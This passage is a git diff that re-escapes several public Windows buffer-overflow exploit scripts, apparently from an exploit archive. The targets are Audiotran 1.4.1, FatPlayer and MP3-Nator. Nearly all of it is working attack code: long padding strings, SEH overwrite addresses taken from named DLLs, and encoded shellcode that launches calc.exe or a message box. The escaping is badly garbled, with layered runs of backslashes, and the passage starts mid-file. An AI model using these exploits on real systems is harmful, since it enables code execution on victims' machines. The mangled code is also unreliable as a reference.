+\\\\\\\"\\\\\\\\x4d\\\\\\\\x43\\\\\\\\x31\\\\\\\\x4f\\\\\\\\x37\\\\\\\\x4d\\\\\\\\x32\\\\\\\\x4a\\\\\\\\x50\\\\\\\\x46\\\\\\\\x32\\\\\\\\x46\\\\\\\\x37\\\\\\\\x4c\\\\\\\\x4b\\\\\\\"
+\\\\\\\"\\\\\\\\x51\\\\\\\\x42\\\\\\\\x42\\\\\\\\x30\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x50\\\\\\\\x42\\\\\\\\x47\\\\\\\\x4c\\\\\\\\x45\\\\\\\\x51\\\\\\\\x4e\\\\\\\\x30\\\\\\\\x4c\\\\\\\"
+\\\\\\\"\\\\\\\\x4b\\\\\\\\x47\\\\\\\\x30\\\\\\\\x42\\\\\\\\x58\\\\\\\\x4d\\\\\\\\x55\\\\\\\\x49\\\\\\\\x50\\\\\\\\x44\\\\\\\\x34\\\\\\\\x50\\\\\\\\x4a\\\\\\\\x45\\\\\\\\x51\\\\\\\"
+\\\\\\\"\\\\\\\\x4e\\\\\\\\x30\\\\\\\\x46\\\\\\\\x30\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x50\\\\\\\\x48\\\\\\\\x45\\\\\\\\x48\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x50\\\\\\\\x58\\\\\\\\x47\\\\\\\"
+\\\\\\\"\\\\\\\\x50\\\\\\\\x45\\\\\\\\x51\\\\\\\\x48\\\\\\\\x53\\\\\\\\x4a\\\\\\\\x43\\\\\\\\x47\\\\\\\\x4c\\\\\\\\x47\\\\\\\\x39\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x47\\\\\\\\x44\\\\\\\"
+\\\\\\\"\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x43\\\\\\\\x31\\\\\\\\x4e\\\\\\\\x36\\\\\\\\x46\\\\\\\\x51\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x50\\\\\\\\x31\\\\\\\\x4f\\\\\\\\x30\\\\\\\\x4e\\\\\\\"
+\\\\\\\"\\\\\\\\x4c\\\\\\\\x4f\\\\\\\\x31\\\\\\\\x48\\\\\\\\x4f\\\\\\\\x44\\\\\\\\x4d\\\\\\\\x45\\\\\\\\x51\\\\\\\\x4f\\\\\\\\x37\\\\\\\\x46\\\\\\\\x58\\\\\\\\x4d\\\\\\\\x30\\\\\\\"
+\\\\\\\"\\\\\\\\x44\\\\\\\\x35\\\\\\\\x4b\\\\\\\\x44\\\\\\\\x45\\\\\\\\x53\\\\\\\\x43\\\\\\\\x4d\\\\\\\\x4b\\\\\\\\x48\\\\\\\\x47\\\\\\\\x4b\\\\\\\\x43\\\\\\\\x4d\\\\\\\\x46\\\\\\\"
+\\\\\\\"\\\\\\\\x44\\\\\\\\x42\\\\\\\\x55\\\\\\\\x4b\\\\\\\\x52\\\\\\\\x50\\\\\\\\x58\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x51\\\\\\\\x48\\\\\\\\x47\\\\\\\\x54\\\\\\\\x43\\\\\\\\x31\\\\\\\"
+\\\\\\\"\\\\\\\\x49\\\\\\\\x43\\\\\\\\x45\\\\\\\\x36\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x44\\\\\\\\x4c\\\\\\\\x50\\\\\\\\x4b\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x51\\\\\\\\x48\\\\\\\\x45\\\\\\\"
+\\\\\\\"\\\\\\\\x4c\\\\\\\\x43\\\\\\\\x31\\\\\\\\x49\\\\\\\\x43\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x43\\\\\\\\x34\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x45\\\\\\\\x51\\\\\\\\x4e\\\\\\\\x30\\\\\\\"
+\\\\\\\"\\\\\\\\x4c\\\\\\\\x49\\\\\\\\x50\\\\\\\\x44\\\\\\\\x46\\\\\\\\x44\\\\\\\\x46\\\\\\\\x44\\\\\\\\x51\\\\\\\\x4b\\\\\\\\x51\\\\\\\\x4b\\\\\\\\x45\\\\\\\\x31\\\\\\\\x46\\\\\\\"
+\\\\\\\"\\\\\\\\x39\\\\\\\\x50\\\\\\\\x5a\\\\\\\\x50\\\\\\\\x51\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x4b\\\\\\\\x50\\\\\\\\x51\\\\\\\\x48\\\\\\\\x51\\\\\\\\x4f\\\\\\\\x51\\\\\\\\x4a\\\\\\\"
+\\\\\\\"\\\\\\\\x4c\\\\\\\\x4b\\\\\\\\x44\\\\\\\\x52\\\\\\\\x4a\\\\\\\\x4b\\\\\\\\x4c\\\\\\\\x46\\\\\\\\x51\\\\\\\\x4d\\\\\\\\x45\\\\\\\\x38\\\\\\\\x50\\\\\\\\x33\\\\\\\\x50\\\\\\\"
+\\\\\\\"\\\\\\\\x32\\\\\\\\x45\\\\\\\\x50\\\\\\\\x43\\\\\\\\x30\\\\\\\\x42\\\\\\\\x48\\\\\\\\x43\\\\\\\\x47\\\\\\\\x43\\\\\\\\x43\\\\\\\\x50\\\\\\\\x32\\\\\\\\x51\\\\\\\\x4f\\\\\\\"
+\\\\\\\"\\\\\\\\x51\\\\\\\\x44\\\\\\\\x42\\\\\\\\x48\\\\\\\\x50\\\\\\\\x4c\\\\\\\\x43\\\\\\\\x47\\\\\\\\x46\\\\\\\\x46\\\\\\\\x43\\\\\\\\x37\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x48\\\\\\\"
+\\\\\\\"\\\\\\\\x55\\\\\\\\x4e\\\\\\\\x58\\\\\\\\x4a\\\\\\\\x30\\\\\\\\x45\\\\\\\\x51\\\\\\\\x45\\\\\\\\x50\\\\\\\\x45\\\\\\\\x50\\\\\\\\x47\\\\\\\\x59\\\\\\\\x48\\\\\\\\x44\\\\\\\"
+\\\\\\\"\\\\\\\\x46\\\\\\\\x34\\\\\\\\x46\\\\\\\\x30\\\\\\\\x43\\\\\\\\x58\\\\\\\\x47\\\\\\\\x59\\\\\\\\x4b\\\\\\\\x30\\\\\\\\x42\\\\\\\\x4b\\\\\\\\x45\\\\\\\\x50\\\\\\\\x4b\\\\\\\"
+\\\\\\\"\\\\\\\\x4f\\\\\\\\x49\\\\\\\\x45\\\\\\\\x46\\\\\\\\x30\\\\\\\\x50\\\\\\\\x50\\\\\\\\x46\\\\\\\\x30\\\\\\\\x50\\\\\\\\x50\\\\\\\\x47\\\\\\\\x30\\\\\\\\x46\\\\\\\\x30\\\\\\\"
+\\\\\\\"\\\\\\\\x47\\\\\\\\x30\\\\\\\\x50\\\\\\\\x50\\\\\\\\x45\\\\\\\\x38\\\\\\\\x4a\\\\\\\\x4a\\\\\\\\x44\\\\\\\\x4f\\\\\\\\x49\\\\\\\\x4f\\\\\\\\x4b\\\\\\\\x50\\\\\\\\x4b\\\\\\\"
+\\\\\\\"\\\\\\\\x4f\\\\\\\\x48\\\\\\\\x55\\\\\\\\x4c\\\\\\\\x49\\\\\\\\x49\\\\\\\\x57\\\\\\\\x42\\\\\\\\x48\\\\\\\\x4e\\\\\\\\x4c\\\\\\\\x42\\\\\\\\x30\\\\\\\\x50\\\\\\\\x4d\\\\\\\"
+\\\\\\\"\\\\\\\\x48\\\\\\\\x5a\\\\\\\\x42\\\\\\\\x48\\\\\\\\x45\\\\\\\\x52\\\\\\\\x45\\\\\\\\x50\\\\\\\\x45\\\\\\\\x51\\\\\\\\x4f\\\\\\\\x4b\\\\\\\\x4c\\\\\\\\x49\\\\\\\\x4d\\\\\\\"
+\\\\\\\"\\\\\\\\x36\\\\\\\\x42\\\\\\\\x4a\\\\\\\\x44\\\\\\\\x50\\\\\\\\x50\\\\\\\\x56\\\\\\\\x51\\\\\\\\x47\\\\\\\\x43\\\\\\\\x58\\\\\\\\x4c\\\\\\\\x59\\\\\\\\x49\\\\\\\\x35\\\\\\\"
+\\\\\\\"\\\\\\\\x42\\\\\\\\x54\\\\\\\\x45\\\\\\\\x31\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x4e\\\\\\\\x35\\\\\\\\x43\\\\\\\\x58\\\\\\\\x42\\\\\\\\x43\\\\\\\\x42\\\\\\\\x4d\\\\\\\\x42\\\\\\\"
+\\\\\\\"\\\\\\\\x44\\\\\\\\x45\\\\\\\\x50\\\\\\\\x4c\\\\\\\\x49\\\\\\\\x4b\\\\\\\\x53\\\\\\\\x51\\\\\\\\x47\\\\\\\\x46\\\\\\\\x37\\\\\\\\x50\\\\\\\\x57\\\\\\\\x46\\\\\\\\x51\\\\\\\"
+\\\\\\\"\\\\\\\\x4b\\\\\\\\x46\\\\\\\\x43\\\\\\\\x5a\\\\\\\\x44\\\\\\\\x52\\\\\\\\x50\\\\\\\\x59\\\\\\\\x50\\\\\\\\x56\\\\\\\\x4a\\\\\\\\x42\\\\\\\\x4b\\\\\\\\x4d\\\\\\\\x42\\\\\\\"
+\\\\\\\"\\\\\\\\x46\\\\\\\\x4f\\\\\\\\x37\\\\\\\\x47\\\\\\\\x34\\\\\\\\x46\\\\\\\\x44\\\\\\\\x47\\\\\\\\x4c\\\\\\\\x45\\\\\\\\x51\\\\\\\\x43\\\\\\\\x31\\\\\\\\x4c\\\\\\\\x4d\\\\\\\"
+\\\\\\\"\\\\\\\\x47\\\\\\\\x34\\\\\\\\x51\\\\\\\\x34\\\\\\\\x42\\\\\\\\x30\\\\\\\\x48\\\\\\\\x46\\\\\\\\x45\\\\\\\\x50\\\\\\\\x50\\\\\\\\x44\\\\\\\\x51\\\\\\\\x44\\\\\\\\x50\\\\\\\"
+\\\\\\\"\\\\\\\\x50\\\\\\\\x46\\\\\\\\x36\\\\\\\\x50\\\\\\\\x56\\\\\\\\x46\\\\\\\\x36\\\\\\\\x47\\\\\\\\x36\\\\\\\\x51\\\\\\\\x46\\\\\\\\x50\\\\\\\\x4e\\\\\\\\x50\\\\\\\\x56\\\\\\\"
+\\\\\\\"\\\\\\\\x46\\\\\\\\x36\\\\\\\\x46\\\\\\\\x33\\\\\\\\x51\\\\\\\\x46\\\\\\\\x42\\\\\\\\x48\\\\\\\\x43\\\\\\\\x49\\\\\\\\x48\\\\\\\\x4c\\\\\\\\x47\\\\\\\\x4f\\\\\\\\x4d\\\\\\\"
+\\\\\\\"\\\\\\\\x56\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x48\\\\\\\\x55\\\\\\\\x4c\\\\\\\\x49\\\\\\\\x4d\\\\\\\\x30\\\\\\\\x50\\\\\\\\x4e\\\\\\\\x51\\\\\\\\x46\\\\\\\\x47\\\\\\\\x36\\\\\\\"
+\\\\\\\"\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x50\\\\\\\\x30\\\\\\\\x43\\\\\\\\x58\\\\\\\\x45\\\\\\\\x58\\\\\\\\x4b\\\\\\\\x37\\\\\\\\x45\\\\\\\\x4d\\\\\\\\x45\\\\\\\\x30\\\\\\\\x4b\\\\\\\"
+\\\\\\\"\\\\\\\\x4f\\\\\\\\x49\\\\\\\\x45\\\\\\\\x4f\\\\\\\\x4b\\\\\\\\x4c\\\\\\\\x30\\\\\\\\x4f\\\\\\\\x45\\\\\\\\x4f\\\\\\\\x52\\\\\\\\x50\\\\\\\\x56\\\\\\\\x42\\\\\\\\x48\\\\\\\"
+\\\\\\\"\\\\\\\\x49\\\\\\\\x36\\\\\\\\x4c\\\\\\\\x55\\\\\\\\x4f\\\\\\\\x4d\\\\\\\\x4d\\\\\\\\x4d\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x4e\\\\\\\\x35\\\\\\\\x47\\\\\\\\x4c\\\\\\\\x43\\\\\\\"
+\\\\\\\"\\\\\\\\x36\\\\\\\\x43\\\\\\\\x4c\\\\\\\\x44\\\\\\\\x4a\\\\\\\\x4d\\\\\\\\x50\\\\\\\\x4b\\\\\\\\x4b\\\\\\\\x4d\\\\\\\\x30\\\\\\\\x43\\\\\\\\x45\\\\\\\\x45\\\\\\\\x55\\\\\\\"
+\\\\\\\"\\\\\\\\x4f\\\\\\\\x4b\\\\\\\\x50\\\\\\\\x47\\\\\\\\x44\\\\\\\\x53\\\\\\\\x44\\\\\\\\x32\\\\\\\\x42\\\\\\\\x4f\\\\\\\\x42\\\\\\\\x4a\\\\\\\\x45\\\\\\\\x50\\\\\\\\x46\\\\\\\"
+\\\\\\\"\\\\\\\\x33\\\\\\\\x4b\\\\\\\\x4f\\\\\\\\x4e\\\\\\\\x35\\\\\\\\x44\\\\\\\\x4a\\\\\\\\x41\\\\\\\\x41\\\\\\\")
 
 
-FILE = open(outputfile, "w")
+FILE = open(outputfile, \\\\\\\"w\\\\\\\")
 FILE.write(shellcode)
 FILE.close()
\ No newline at end of file
diff --git a/platforms/windows/local/11079.rb b/platforms/windows/local/11079.rb
index 017f4aaf5..35a69cb36 100755
--- a/platforms/windows/local/11079.rb
+++ b/platforms/windows/local/11079.rb
@@ -10,59 +10,59 @@
 # Type of vuln  : Stack Overflow / SEH
 # Greetz to     : Corelan Team::corelanc0d3r/EdiStrosar/Rick2600/MarkoT/mr_me
 #
-# Script provided 'as is', without any warranty.
+# Script provided \\\'as is\\\', without any warranty.
 # Use for educational purposes only.
 #
 #
 #
 
 banner =
-"|------------------------------------------------------------------|\n" +
-"|                         __               __                      |\n" +
-"|   _________  ________  / /___ _____     / /____  ____ _____ ___  |\n" +
-"|  / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\   / __/ _ \\/ __ `/ __ `__ \\ |\n" +
-"| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |\n" +
-"| \\___/\\____/_/   \\___/_/\\__,_/_/ /_/   \\__/\\___/\\__,_/_/ /_/ /_/  |\n" +
-"|                                                                  |\n" +
-"|                                       http://www.corelan.be:8800 |\n" +
-"|                                                                  |\n" +
-"|-------------------------------------------------[ EIP Hunters ]--|\n\n"
+\\\"|------------------------------------------------------------------|\\\\n\\\" +
+\\\"|                         __               __                      |\\\\n\\\" +
+\\\"|   _________  ________  / /___ _____     / /____  ____ _____ ___  |\\\\n\\\" +
+\\\"|  / ___/ __ \\\\\\\\/ ___/ _ \\\\\\\\/ / __ `/ __ \\\\\\\\   / __/ _ \\\\\\\\/ __ `/ __ `__ \\\\\\\\ |\\\\n\\\" +
+\\\"| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |\\\\n\\\" +
+\\\"| \\\\\\\\___/\\\\\\\\____/_/   \\\\\\\\___/_/\\\\\\\\__,_/_/ /_/   \\\\\\\\__/\\\\\\\\___/\\\\\\\\__,_/_/ /_/ /_/  |\\\\n\\\" +
+\\\"|                                                                  |\\\\n\\\" +
+\\\"|                                       http://www.corelan.be:8800 |\\\\n\\\" +
+\\\"|                                                                  |\\\\n\\\" +
+\\\"|-------------------------------------------------[ EIP Hunters ]--|\\\\n\\\\n\\\"
 
 # Corelan Team MsgBox
 payload =
-"\xeb\x22\x56\x31\xc0\x64\x8b\x40\x30\x85\xc0\x78" +
-"\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\xeb" +
-"\x09\x8b\x40\x34\x8d\x40\x7c\x8b\x40\x3c\x5e\xc3" +
-"\xeb\x69\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54" +
-"\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb" +
-"\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0" +
-"\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb" +
-"\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb" +
-"\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b" +
-"\x01\xe8\x89\x44\x24\x1c\x61\xc3\xad\x50\x52\xe8" +
-"\xaa\xff\xff\xff\x89\x07\x44\x44\x44\x44\x44\x44" +
-"\x44\x44\x47\x47\x47\x47\x39\xce\x75\xe6\xc3\x4c" +
-"\x4c\x4c\x4c\x89\xe5\xe8\x68\xff\xff\xff\x89\xc2" +
-"\xeb\x1c\x5e\x8d\x7d\x04\x89\xf1\x80\xc1\x0c\xe8" +
-"\xc8\xff\xff\xff\xeb\x15\x31\xd2\x59\x88\x51\x36" +
-"\x51\x52\xff\x54\x24\x0c\xe8\xdf\xff\xff\xff\x57" +
-"\x7f\x29\x62\xe8\xe6\xff\xff\xff\x43\x6f\x72\x65" +
-"\x6c\x61\x6e\x20\x54\x65\x61\x6d\x20\x53\x68\x65" +
-"\x6c\x6c\x63\x6f\x64\x65\x20\x2d\x20\x50\x72\x6f" +
-"\x67\x72\x61\x6d\x20\x65\x78\x70\x6c\x6f\x69\x74" +
-"\x65\x64\x20\x73\x75\x63\x65\x73\x73\x66\x75\x6c" +
-"\x6c\x79\x58"
+\\\"\\\\xeb\\\\x22\\\\x56\\\\x31\\\\xc0\\\\x64\\\\x8b\\\\x40\\\\x30\\\\x85\\\\xc0\\\\x78\\\" +
+\\\"\\\\x0c\\\\x8b\\\\x40\\\\x0c\\\\x8b\\\\x70\\\\x1c\\\\xad\\\\x8b\\\\x40\\\\x08\\\\xeb\\\" +
+\\\"\\\\x09\\\\x8b\\\\x40\\\\x34\\\\x8d\\\\x40\\\\x7c\\\\x8b\\\\x40\\\\x3c\\\\x5e\\\\xc3\\\" +
+\\\"\\\\xeb\\\\x69\\\\x60\\\\x8b\\\\x6c\\\\x24\\\\x24\\\\x8b\\\\x45\\\\x3c\\\\x8b\\\\x54\\\" +
+\\\"\\\\x05\\\\x78\\\\x01\\\\xea\\\\x8b\\\\x4a\\\\x18\\\\x8b\\\\x5a\\\\x20\\\\x01\\\\xeb\\\" +
+\\\"\\\\xe3\\\\x34\\\\x49\\\\x8b\\\\x34\\\\x8b\\\\x01\\\\xee\\\\x31\\\\xff\\\\x31\\\\xc0\\\" +
+\\\"\\\\xfc\\\\xac\\\\x84\\\\xc0\\\\x74\\\\x07\\\\xc1\\\\xcf\\\\x0d\\\\x01\\\\xc7\\\\xeb\\\" +
+\\\"\\\\xf4\\\\x3b\\\\x7c\\\\x24\\\\x28\\\\x75\\\\xe1\\\\x8b\\\\x5a\\\\x24\\\\x01\\\\xeb\\\" +
+\\\"\\\\x66\\\\x8b\\\\x0c\\\\x4b\\\\x8b\\\\x5a\\\\x1c\\\\x01\\\\xeb\\\\x8b\\\\x04\\\\x8b\\\" +
+\\\"\\\\x01\\\\xe8\\\\x89\\\\x44\\\\x24\\\\x1c\\\\x61\\\\xc3\\\\xad\\\\x50\\\\x52\\\\xe8\\\" +
+\\\"\\\\xaa\\\\xff\\\\xff\\\\xff\\\\x89\\\\x07\\\\x44\\\\x44\\\\x44\\\\x44\\\\x44\\\\x44\\\" +
+\\\"\\\\x44\\\\x44\\\\x47\\\\x47\\\\x47\\\\x47\\\\x39\\\\xce\\\\x75\\\\xe6\\\\xc3\\\\x4c\\\" +
+\\\"\\\\x4c\\\\x4c\\\\x4c\\\\x89\\\\xe5\\\\xe8\\\\x68\\\\xff\\\\xff\\\\xff\\\\x89\\\\xc2\\\" +
+\\\"\\\\xeb\\\\x1c\\\\x5e\\\\x8d\\\\x7d\\\\x04\\\\x89\\\\xf1\\\\x80\\\\xc1\\\\x0c\\\\xe8\\\" +
+\\\"\\\\xc8\\\\xff\\\\xff\\\\xff\\\\xeb\\\\x15\\\\x31\\\\xd2\\\\x59\\\\x88\\\\x51\\\\x36\\\" +
+\\\"\\\\x51\\\\x52\\\\xff\\\\x54\\\\x24\\\\x0c\\\\xe8\\\\xdf\\\\xff\\\\xff\\\\xff\\\\x57\\\" +
+\\\"\\\\x7f\\\\x29\\\\x62\\\\xe8\\\\xe6\\\\xff\\\\xff\\\\xff\\\\x43\\\\x6f\\\\x72\\\\x65\\\" +
+\\\"\\\\x6c\\\\x61\\\\x6e\\\\x20\\\\x54\\\\x65\\\\x61\\\\x6d\\\\x20\\\\x53\\\\x68\\\\x65\\\" +
+\\\"\\\\x6c\\\\x6c\\\\x63\\\\x6f\\\\x64\\\\x65\\\\x20\\\\x2d\\\\x20\\\\x50\\\\x72\\\\x6f\\\" +
+\\\"\\\\x67\\\\x72\\\\x61\\\\x6d\\\\x20\\\\x65\\\\x78\\\\x70\\\\x6c\\\\x6f\\\\x69\\\\x74\\\" +
+\\\"\\\\x65\\\\x64\\\\x20\\\\x73\\\\x75\\\\x63\\\\x65\\\\x73\\\\x73\\\\x66\\\\x75\\\\x6c\\\" +
+\\\"\\\\x6c\\\\x79\\\\x58\\\"
 
 print banner
-puts "[+] Exploit for Audiotran 1.4.1."
+puts \\\"[+] Exploit for Audiotran 1.4.1.\\\"
 
-filename = "audiotran_poc.pls"
-f = File.new(filename, 'w')
-f.write 'A' * 1308 #padding
-f.write "\xeb\x06\x90\x90"
-f.write "\xcb\x75\x52\x73" # ret at 0x735275CB [msvbvm60.dll]
+filename = \\\"audiotran_poc.pls\\\"
+f = File.new(filename, \\\'w\\\')
+f.write \\\'A\\\' * 1308 #padding
+f.write \\\"\\\\xeb\\\\x06\\\\x90\\\\x90\\\"
+f.write \\\"\\\\xcb\\\\x75\\\\x52\\\\x73\\\" # ret at 0x735275CB [msvbvm60.dll]
 f.write payload
-f.write 'A' * 9000 # padding
+f.write \\\'A\\\' * 9000 # padding
 f.close
 
-puts "[+] Wrote exploit file : #{filename}."
\ No newline at end of file
+puts \\\"[+] Wrote exploit file : #{filename}.\\\"
\ No newline at end of file
diff --git a/platforms/windows/local/15279.rb b/platforms/windows/local/15279.rb
index 9f2c26e77..a3dc75cf6 100755
--- a/platforms/windows/local/15279.rb
+++ b/platforms/windows/local/15279.rb
@@ -8,36 +8,36 @@
 
 #! /usr/bin/env ruby
 
-junk = "\x41" * 4132
+junk = \"\\x41\" * 4132
 
-nSEH = "\x90\x90\xeb\x06"
+nSEH = \"\\x90\\x90\\xeb\\x06\"
 
-SEH = [0x0046bee3].pack('V') #pop pop ret from FatPlayer.exe
+SEH = [0x0046bee3].pack(\'V\') #pop pop ret from FatPlayer.exe
 
-junk2 = "\x42\x42"
+junk2 = \"\\x42\\x42\"
 
 # windows/exec - 144 bytes
 # http://www.metasploit.com
 # Encoder: x86/shikata_ga_nai
 # EXITFUNC=seh, CMD=calc
-payload =  "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc"
-payload << "\xd9\x74\x24\xf4\xb1\x1e\x58\x31\x78"
-payload << "\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85"
-payload << "\x30\x78\xbc\x65\xc9\x78\xb6\x23\xf5"
-payload << "\xf3\xb4\xae\x7d\x02\xaa\x3a\x32\x1c"
-payload << "\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21"
-payload << "\xe7\x96\x60\xf5\x71\xca\x06\x35\xf5"
-payload << "\x14\xc7\x7c\xfb\x1b\x05\x6b\xf0\x27"
-payload << "\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3"
-payload << "\xf7\x3b\x7a\xcf\x4c\x4f\x23\xd3\x53"
-payload << "\xa4\x57\xf7\xd8\x3b\x83\x8e\x83\x1f"
-payload << "\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6"
-payload << "\xf5\xc1\x7e\x98\xf5\xaa\xf1\x05\xa8"
-payload << "\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"
-payload << "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f"
-payload << "\x59\x90\x7b\xd7\x05\x7f\xe8\x7b\xca"
+payload =  \"\\xdb\\xc0\\x31\\xc9\\xbf\\x7c\\x16\\x70\\xcc\"
+payload << \"\\xd9\\x74\\x24\\xf4\\xb1\\x1e\\x58\\x31\\x78\"
+payload << \"\\x18\\x83\\xe8\\xfc\\x03\\x78\\x68\\xf4\\x85\"
+payload << \"\\x30\\x78\\xbc\\x65\\xc9\\x78\\xb6\\x23\\xf5\"
+payload << \"\\xf3\\xb4\\xae\\x7d\\x02\\xaa\\x3a\\x32\\x1c\"
+payload << \"\\xbf\\x62\\xed\\x1d\\x54\\xd5\\x66\\x29\\x21\"
+payload << \"\\xe7\\x96\\x60\\xf5\\x71\\xca\\x06\\x35\\xf5\"
+payload << \"\\x14\\xc7\\x7c\\xfb\\x1b\\x05\\x6b\\xf0\\x27\"
+payload << \"\\xdd\\x48\\xfd\\x22\\x38\\x1b\\xa2\\xe8\\xc3\"
+payload << \"\\xf7\\x3b\\x7a\\xcf\\x4c\\x4f\\x23\\xd3\\x53\"
+payload << \"\\xa4\\x57\\xf7\\xd8\\x3b\\x83\\x8e\\x83\\x1f\"
+payload << \"\\x57\\x53\\x64\\x51\\xa1\\x33\\xcd\\xf5\\xc6\"
+payload << \"\\xf5\\xc1\\x7e\\x98\\xf5\\xaa\\xf1\\x05\\xa8\"
+payload << \"\\x26\\x99\\x3d\\x3b\\xc0\\xd9\\xfe\\x51\\x61\"
+payload << \"\\xb6\\x0e\\x2f\\x85\\x19\\x87\\xb7\\x78\\x2f\"
+payload << \"\\x59\\x90\\x7b\\xd7\\x05\\x7f\\xe8\\x7b\\xca\"
 
 
-File.open("crash.wav", 'w') do |b|
+File.open(\"crash.wav\", \'w\') do |b|
 	b.write junk + nSEH + SEH + junk2 + payload
 end
diff --git a/platforms/windows/local/15489.py b/platforms/windows/local/15489.py
index b00078d9d..0e1bfb668 100755
--- a/platforms/windows/local/15489.py
+++ b/platforms/windows/local/15489.py
@@ -1,7 +1,7 @@
 #!usr/bin/python
 #
 #Exploit Title: Exploit Buffer Overflow MP3-Nator
-#Date: 10\11\2010
+#Date: 10\\11\\2010
 #Author: C4SS!0 G0M3S
 #Software Link: http://www.brothersoft.com/d.php?soft_id=16524&url=http%3A%2F%2Ffiles.brothersoft.com%2Fmp3_audio%2Fplayers%2Fmp3nator.zip
 #Version: 2.0
@@ -19,64 +19,64 @@
 import os,sys
 
 def layout():
-    os.system("cls")
-    os.system("color 4f")
-    print("\n[+]Exploit    :    Exploit Buffer Overflow MP3-NATOR v2.0")
-    print("[+]Author     :    C4SS!0 G0M3S")
-    print("[+]E-mail     :    Louredo_@hotmail.com")
-    print("[+]Home       :    http://www.invasao.com.br")
-    print("[+]Impact     :    Hich")
-    print("[+]Version    :    2.0\n")
+    os.system(\"cls\")
+    os.system(\"color 4f\")
+    print(\"\\n[+]Exploit    :    Exploit Buffer Overflow MP3-NATOR v2.0\")
+    print(\"[+]Author     :    C4SS!0 G0M3S\")
+    print(\"[+]E-mail     :    Louredo_@hotmail.com\")
+    print(\"[+]Home       :    http://www.invasao.com.br\")
+    print(\"[+]Impact     :    Hich\")
+    print(\"[+]Version    :    2.0\\n\")
 
 if len(sys.argv)!=2:
 
     layout()
-    print("[-]Usage: Exploit.py ")
-    print("[-]Exemple: Exploit.py musics.plf\n")
-    print("[-]Note: The Extension of the File Should be .plf for the Exploit Work")
+    print(\"[-]Usage: Exploit.py \")
+    print(\"[-]Exemple: Exploit.py musics.plf\\n\")
+    print(\"[-]Note: The Extension of the File Should be .plf for the Exploit Work\")
     
 else:
     #Exec The Calc.exe
-    buffer = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
-    "\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"  
-    "\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"
-    "\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"
-    "\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
-    "\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
-    "\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"
-    "\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"
-    "\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"
-    "\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
-    "\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"
-    "\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
-    "\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
-    "\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"
-    "\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
-    "\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
-    "\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
-    "\x4e\x46\x43\x36\x42\x50\x5a")
+    buffer = (\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\"
